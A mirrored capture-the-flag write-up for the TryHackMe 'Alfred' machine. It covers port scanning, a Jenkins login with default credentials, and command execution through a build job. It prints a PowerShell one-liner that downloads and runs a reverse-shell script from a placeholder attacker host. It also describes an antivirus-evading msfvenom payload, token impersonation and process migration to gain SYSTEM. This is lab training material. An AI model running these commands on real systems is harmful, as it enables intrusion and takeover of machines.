Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-09-20 06:11:56 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/TryHackMe/Alfred.md
ARZ 450368f580
Add files via upload
2021-05-08 06:13:02 +05:00

4.3 KiB
Raw Blame History

TryHackMe-Alfred

Rustscan

PORT     STATE SERVICE    REASON          VERSION   
80/tcp   open  http       syn-ack ttl 127 Microsoft IIS httpd 7.5
| http-methods:                                                    
|   Supported Methods: OPTIONS TRACE GET HEAD POST                        
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5      
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  tcpwrapped syn-ack ttl 127  
8080/tcp open  http       syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT        
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1     
| http-robots.txt: 1 disallowed entry                                     
|_/                                                                       
|_http-server-header: Jetty(9.4.z-SNAPSHOT)                               
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

PORT 80 (HTTP)

Here we don't see anything intersting so let's move to other http port

PORT 8080 (HTTP)

We can see jenkins login portal so let's try using the default credentials

admin:password

And it didn't work , let's try admin:admin

This worked are we are in, now we need to find where we can execute commands so we can get a reverse shell on the target machine

Hover over the project you'll get a dropdown menu

You'll have options like "Changes", "Workspace", "Build Now", "Delete Project"," Configure" and "Rename". Select `Configure`

Switch to Build Environment Tab

Here you can see there's a command written whoami so let's click on Apply and Save

Click on #2 then Console Ouput

And you can see what ever command we input there it will show the output so now what we can do is to host a powershell reverse shell script ,download it using powershell and execute the function in the script to get a shell

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

Start your python3 http server

And our command will look like this , start a netcat listener

Now click on Build Now and that job will run and you'll get a shell

Generate a msfvenom payload with encoders to by pass AV

Host it on your local machine and download it by repeating the same method

Set up your metasploit listener

Execute the payload and you'll see a meterpreter session will be popped

Running the command getprivs we can see what privileges we have on the machine

Here we can escalate our privleges through SeImpersonatePrivilege

Run the command load icognito through this module we can impersonate tokens

Now even though we have SYSTEM on the machine but still we won't be able to access system files as it uses the primary token of the process and not the impersonated token so we need to migrate to a process running as SYSTEM which is services.exe